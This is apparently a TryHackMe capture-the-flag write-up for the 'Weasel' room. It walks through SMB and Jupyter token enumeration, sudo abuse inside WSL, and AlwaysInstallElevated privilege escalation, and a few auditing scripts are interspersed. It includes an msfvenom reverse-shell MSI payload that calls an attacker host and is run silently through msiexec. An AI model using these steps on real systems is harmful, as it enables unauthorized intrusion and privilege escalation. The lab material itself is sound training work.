TryHackMe Rooms - Weasel
Logging in via Jupyter tokens - Mounting WSL for PrivEsc 1 - Logging in via SSH key - Finding AutoLogon creds - Abusing the AlwaysInstallElevated feature for PrivEsc 2
Scanning
Starting off with an Nmap scan
22/tcp open ssh syn-ack OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 2b:17:d8:8a:1e:8c:99:bc:5b:f5:3d:0a:5e:ff:5e:5e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBae1NsdsMcZJNQQ2wjF2sxXK2ZF3c7qqW3TN/q91pWiDee3nghS1J1FZrUXaEj0wnAAAbYRg5vbRZRP9oEagBwfWG3QJ9AO6s5UC+iTjX+YKH6phKNmsY5N/LKY4+2EDcwa5R4uznAC/2Cy5EG6s7izvABLcRh3h/w4rVHduiwrueAZF9UjzlHBOxHDOPPVtg+0dniGhcXRuEU5FYRA8/IPL8P97djscu23btk/hH3iqdQWlC9b0CnOkD8kuyDybq9nFaebAxDW4XFj7KjCRuuu0dyn5Sr62FwRXO4wu08ePUEmJF1Gl3/fdYe3vj+iE2yewOFAhzbmFWEWtztjJb
| 256 3c:c0:fd:b5:c1:57:ab:75:ac:81:10:ae:e2:98:12:0d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOGl51l9Z4Mg4hFDcQz8v6XRlABMyVPWlkEXrJIg53piZhZ9WKYn0Gi4fKkzo3blDAsdqpGFQ11wwocBCSJGjQU=
| 256 e9:f0:30:be:e6:cf:ef:fe:2d:14:21:a0:ac:45:7b:70 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOHw9uTZkIMEgcZPW9Z28Mm+FX66+hkxk+8rOu7oI6J9
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
|_ssl-date: 2023-06-12T16:00:35+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DEV-DATASCI-JUP
| Issuer: commonName=DEV-DATASCI-JUP
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-03-12T11:46:50
| Not valid after: 2023-09-11T11:46:50
| MD5: 1671:b190:2eb6:b15f:0c3f:ab16:d3e6:6582
| SHA-1: c007:197a:dd30:f17f:2bdb:65f8:1804:fc6f:d081:c7c9
| rdp-ntlm-info:
| Target_Name: DEV-DATASCI-JUP
| NetBIOS_Domain_Name: DEV-DATASCI-JUP
| NetBIOS_Computer_Name: DEV-DATASCI-JUP
| DNS_Domain_Name: DEV-DATASCI-JUP
| DNS_Computer_Name: DEV-DATASCI-JUP
| Product_Version: 10.0.17763
|_ System_Time: 2023-06-12T16:00:26+00:00
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8888/tcp open http syn-ack Tornado httpd 6.0.3
|_http-favicon: Unknown favicon MD5: 97C6417ED01BDC0AE3EF32AE4894FD03
| http-robots.txt: 1 disallowed entry
|_/
| http-title: Jupyter Notebook
|_Requested resource was /login?next=%2Ftree%3F
| http-methods:
|_ Supported Methods: GET POST
|_http-server-header: TornadoServer/6.0.3
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49674/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-06-12T16:00:28
|_ start_date: N/A
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 26077/tcp): CLEAN (Couldn't connect)
| Check 2 (port 11157/tcp): CLEAN (Couldn't connect)
| Check 3 (port 33818/udp): CLEAN (Timeout)
| Check 4 (port 36841/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
Let's make some mental notes!
Port 22 is open; we need valid credentials to log in.
Port 135: let's check whether anonymous logins are enabled, so that we can enumerate usernames (enumdomusers).
Ports 139 & 445: check for anonymous logins and open SMB shares.
Port 8888: a Tornado HTTP server running Jupyter Notebook - maybe our initial foothold!
Enumeration
Starting off with the SMB enumeration!
$ crackmapexec smb 10.10.146.197 -u 'anonymous' -p 'anonymous' --shares Monday 12 June 2023 09:32:51 PM
SMB 10.10.146.197 445 DEV-DATASCI-JUP [*] Windows 10.0 Build 17763 x64 (name:DEV-DATASCI-JUP) (domain:DEV-DATASCI-JUP) (signing:False) (SMBv1:False)
SMB 10.10.146.197 445 DEV-DATASCI-JUP [+] DEV-DATASCI-JUP\anonymous:anonymous
SMB 10.10.146.197 445 DEV-DATASCI-JUP [+] Enumerated shares
SMB 10.10.146.197 445 DEV-DATASCI-JUP Share Permissions Remark
SMB 10.10.146.197 445 DEV-DATASCI-JUP ----- ----------- ------
SMB 10.10.146.197 445 DEV-DATASCI-JUP ADMIN$ Remote Admin
SMB 10.10.146.197 445 DEV-DATASCI-JUP C$ Default share
SMB 10.10.146.197 445 DEV-DATASCI-JUP datasci-team READ,WRITE
SMB 10.10.146.197 445 DEV-DATASCI-JUP IPC$ READ Remote IPC
Since we have READ permission over the IPC$ share, let's enumerate some usernames!
$ impacket-lookupsid 'weasel.thm/anonymous@10.10.146.197' -no-pass | tee usernames.txt 13.5s _ Monday 12 June 2023 09:34:19 PM
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.146.197
[*] StringBinding ncacn_np:10.10.146.197[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2336295375-1619315875-398172279
500: DEV-DATASCI-JUP\Administrator (SidTypeUser)
501: DEV-DATASCI-JUP\Guest (SidTypeUser)
503: DEV-DATASCI-JUP\DefaultAccount (SidTypeUser)
504: DEV-DATASCI-JUP\WDAGUtilityAccount (SidTypeUser)
513: DEV-DATASCI-JUP\None (SidTypeGroup)
1000: DEV-DATASCI-JUP\dev-datasci-lowpriv (SidTypeUser)
1001: DEV-DATASCI-JUP\sshd (SidTypeUser)
$ cat users Monday 12 June 2023 09:36:05 PM
500: DEV-DATASCI-JUP\Administrator (SidTypeUser)
501: DEV-DATASCI-JUP\Guest (SidTypeUser)
503: DEV-DATASCI-JUP\DefaultAccount (SidTypeUser)
504: DEV-DATASCI-JUP\WDAGUtilityAccount (SidTypeUser)
513: DEV-DATASCI-JUP\None (SidTypeGroup)
1000: DEV-DATASCI-JUP\dev-datasci-lowpriv (SidTypeUser)
1001: DEV-DATASCI-JUP\sshd (SidTypeUser)
cat users | grep SidTypeUser | cut -d '\\' -f 2 | cut -d '(' -f 1 > valid_users Monday 12 June 2023 09:36:08 PM
cat valid_users Monday 12 June 2023 09:36:48 PM
Administrator
Guest
DefaultAccount
WDAGUtilityAccount
dev-datasci-lowpriv
sshd
Now let's explore some open shares!
Wow, cool, we have a Jupyter token, which acts as a password. Now let's log in through the HTTP port!
We can now either edit an existing .ipynb file and insert our Python reverse shell to get the initial foothold, or directly get a terminal from the New option!
GNU/Linux indicates that the OS is Linux
DEV-DATASCI-JUP is the hostname (the machine name)
4.4.0-17763-Microsoft is the kernel version of the Linux operating system
(base) in the Linux prompt refers to an activated virtual environment (here conda's base environment)
#2268-Microsoft is the build number, i.e. the patch level of that kernel
After all this recon, we can guess that we are in WSL (Windows Subsystem for Linux): the main host is Windows, and we are currently inside the Linux distribution installed in WSL.
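The uname fields decoded above can be parsed mechanically. The script below is an added example, not part of the original writeup: it splits a uname -a line into its fields and tells WSL1 (the fake 4.4.0-<build>-Microsoft kernel seen here) from WSL2 (a real microsoft-standard kernel), which matters because root inside the distro is still only the launching Windows user on the host's drives. The sample lines are constructed; only the kernel strings and hostname mirror the page.

```python
import re

# Constructed sample lines shaped like `uname -a` output; the first mirrors the fields decoded above
# (kernel 4.4.0-17763-Microsoft, build #2268-Microsoft), the date and the second line are made up.
SAMPLE_WSL1 = ("Linux DEV-DATASCI-JUP 4.4.0-17763-Microsoft #2268-Microsoft "
               "Thu Aug 30 17:32:00 PST 2018 x86_64 x86_64 x86_64 GNU/Linux")
SAMPLE_WSL2 = ("Linux devbox 5.15.90.1-microsoft-standard-WSL2 #1 SMP "
               "Fri Jan 27 02:56:13 UTC 2023 x86_64 GNU/Linux")

UNAME_RE = re.compile(r"^(?P<sysname>\S+)\s+(?P<hostname>\S+)\s+(?P<release>\S+)\s+(?P<version>#\S+)")

def parse_uname(line: str) -> dict:
    """Split a `uname -a` line into its fields and decide whether the shell runs inside WSL.

    WSL1 exposes a fake 4.4.0-<Windows build>-Microsoft kernel whose '#NNNN-Microsoft' version
    is the patch level; WSL2 runs a real Microsoft-built kernel tagged 'microsoft-standard'.
    """
    m = UNAME_RE.match(line.strip())
    if not m:
        raise ValueError("not a `uname -a` line: %r" % line)
    info = m.groupdict()
    info.update(wsl=None, windows_build=None, kernel_patch=None)
    wsl1 = re.fullmatch(r"4\.4\.0-(\d+)-Microsoft", info["release"])
    if wsl1:
        info["wsl"] = 1
        info["windows_build"] = int(wsl1.group(1))  # 17763 = the Windows host's build number
        patch = re.fullmatch(r"#(\d+)-Microsoft", info["version"])
        if patch:
            info["kernel_patch"] = int(patch.group(1))
    elif "microsoft-standard" in info["release"].lower():
        info["wsl"] = 2
    return info

if __name__ == "__main__":
    import subprocess
    try:
        live = subprocess.run(["uname", "-a"], capture_output=True, text=True).stdout
    except OSError:
        live = ""
    for line in (SAMPLE_WSL1, SAMPLE_WSL2, live):
        if line:
            print(parse_uname(line))
```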
The file dev-datasci-lowpriv_id_ed25519 looks like a private SSH key for the dev-datasci-lowpriv user we enumerated at the start!
Privilege Escalation - via Mounting WSL
Let's see the sudo privileges - what can our user run on the system!
So we can run /home/dev-datasci/.local/bin/jupyter with sudo privileges.
Let's see the permissions we have over this file!
Cool, let's copy our /bin/bash to that location and execute it with sudo!
Okay, so now we are root inside WSL; let's check for the flags!
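The misconfiguration behind this escalation is a sudo rule whose target the invoking user can replace. The following Python audit script is an added check, not part of the writeup or of any tool it mentions: it parses a sudo -l listing (a constructed sample is embedded; the live run uses sudo -n -l) and flags every command path that is writable, or missing from a directory that is writable, by the current user.

```python
import os
import re
import subprocess

# Constructed `sudo -l` listing shaped like the rule discussed above; not the box's real output.
SAMPLE_SUDO_L = """Matching Defaults entries for dev-datasci on DEV-DATASCI-JUP:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User dev-datasci may run the following commands on DEV-DATASCI-JUP:
    (ALL) NOPASSWD: /home/dev-datasci/.local/bin/jupyter
    (root) /usr/bin/apt-get update, /usr/bin/systemctl restart jupyter
"""

# One sudoers line: "(runas) [TAG: ...] cmd[, cmd...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_rules(text: str) -> list:
    """Return (runas, nopasswd, command_path) for every command in a `sudo -l` listing."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            parts = cmd.split()  # keep the binary, drop any argument restriction
            if parts and parts[0].startswith("/"):
                rules.append((m.group("runas").strip(), nopasswd, parts[0]))
    return rules

def writable_sudo_targets(rules, access=os.access, exists=os.path.exists) -> list:
    """Flag targets the invoking user could replace: the file itself is writable, or its directory
    is (a missing binary in a writable directory is exactly the jupyter case above)."""
    findings = []
    for runas, nopasswd, path in rules:
        if exists(path) and access(path, os.W_OK):
            findings.append((path, "file writable", runas, nopasswd))
        elif access(os.path.dirname(path), os.W_OK):
            reason = "missing, directory writable" if not exists(path) else "directory writable"
            findings.append((path, reason, runas, nopasswd))
    return findings

if __name__ == "__main__":
    # -n: never prompt, so the script can run unattended from a config-audit job
    out = subprocess.run(["sudo", "-n", "-l"], capture_output=True, text=True).stdout
    for finding in writable_sudo_targets(parse_sudo_rules(out)):
        print("%s: %s (runas %s, NOPASSWD=%s)" % finding)
```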
Looks like the host Windows filesystem isn't mounted yet! So let's mount it. The mounting process is described in this Stack Overflow page:
mount -t drvfs 'c:' /mnt/c
-t drvfs: this option specifies the type of filesystem to mount. Here, drvfs is the filesystem driver WSL uses to access Windows drives.
Privilege Escalation - via the AlwaysInstallElevated Feature
So we have the dev-datasci-lowpriv user's SSH key - let's log on to that account.
We've directly logged in as a Windows user :)
Let's run winPEAS now
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe
AlwaysInstallElevated is a Windows feature that allows a standard user account with no administrative privileges to install software packaged in the Microsoft Windows Installer (MSI) format with admin privileges! - How do we abuse it now?
We can leverage this configuration to elevate our privileges by generating a custom executable in the MSI format.
We can use the msiexec utility to execute the MSI package, which will give us an elevated session.
The AlwaysInstallElevated feature is configured in the Windows Registry.
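The registry setting in question lives under SOFTWARE\Policies\Microsoft\Windows\Installer in both HKLM and HKCU, and Windows Installer only honours it when both values are 1. The script below is an added audit helper (not from the room or winPEAS) that reads both hives with Python's winreg module, reports whether the policy is effective or only half-set, and names the Group Policy setting that controls it.

```python
import sys

# Documented location of the policy value; it must be 1 in BOTH hives for the feature to be active.
POLICY_KEY = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
VALUE_NAME = "AlwaysInstallElevated"

def evaluate(hklm, hkcu) -> dict:
    """Interpret the pair of values; None stands for 'key or value absent'."""
    machine = hklm == 1
    user = hkcu == 1
    return {
        "hklm": hklm, "hkcu": hkcu,
        "effective": machine and user,  # Windows Installer honours it only when both hives say 1
        "partial": machine != user,     # one hive set: not exploitable yet, one change away from it
    }

def read_policy_values():
    """Read both hives on Windows; returns (hklm, hkcu) with None for a missing key or value."""
    import winreg  # Windows-only module, imported lazily so evaluate() works on any platform
    values = []
    for hive in (winreg.HKEY_LOCAL_MACHINE, winreg.HKEY_CURRENT_USER):
        try:
            with winreg.OpenKey(hive, POLICY_KEY) as key:
                value, _ = winreg.QueryValueEx(key, VALUE_NAME)
                values.append(value)
        except OSError:
            values.append(None)
    return tuple(values)

if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("run this on the Windows host")
    verdict = evaluate(*read_policy_values())
    print(verdict)
    if verdict["effective"]:
        print("AlwaysInstallElevated is active: any user's MSI installs with SYSTEM privileges. "
              "Disable the 'Always install with elevated privileges' setting under "
              "Administrative Templates > Windows Components > Windows Installer (Computer and "
              "User Configuration), or set both registry values to 0.")
```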
Craft a payload with msfvenom and transfer it to the victim machine - meanwhile, set up the listener!
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<KALI-IP> LPORT=<PORT> -f msi > setup.msi
On the victim machine, execute the package using msiexec
msiexec /qn /i [absolute location of executable]
msiexec is a command-line utility for installing MSI packages
/qn => the installation should happen quietly, without any prompt
/i => install the package!
But on executing it, the shell doesn't pop up on the listener :(
A solution to this can be using the runas command
The runas command is just like sudo in Linux: we can specify the user we want to run a specific command as!
runas /user:[username] "command"
So let's run this command!
runas /user:dev-datasci-lowpriv "msiexec /quiet /qn /i C:\Users\dev-datasci-lowpriv\Desktop\malicious.msi"
This will ask you for the user's password, which we have retrieved as well; let's enter it and execute
We are ROOT now :)